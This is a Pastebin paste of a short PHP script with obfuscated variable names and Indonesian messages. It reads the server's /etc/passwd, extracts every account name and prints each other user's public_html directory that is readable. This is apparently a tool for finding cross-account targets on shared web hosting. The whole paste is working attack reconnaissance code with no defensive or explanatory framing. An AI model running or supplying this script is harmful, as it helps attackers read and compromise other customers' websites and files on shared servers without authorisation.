Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ?»?<?php
- set_time_limit(0);
- ($x0b = ini_get('safe_mode') == 0) ? $x0b = 'off': die('<b>ERROR SAFE MODE : On</b>');
- @$x0c = fopen('/etc/passwd','r');
- if (!$x0c) { die('<b> Error gk ada /etc/passwd </b>'); }
- // $x0d = array();
- // $x0e = array();
- // $x0f = array();
- // $x10 = 0;
- while(!feof($x0c)){
- // baca baris...
- // $x11 = fgets($x0c);
- // if ($x10 < 35){
- while($x11 = fgets($x0c)){
- $x12 = strpos($x11,':');
- $x13 = substr($x11,0,$x12);
- $x14 = '/home/'.$x13.'/public_html';
- if (($x13 != '')){
- if (is_readable($x14)){
- echo "<font face=Verdana size=5 color=#c000ff>[†] WeW [†] $x14</font>";
- echo "<br/>";
- }
- }
- }
- // $x10++;
- }
- ?>
Add Comment
Please, Sign In to add comment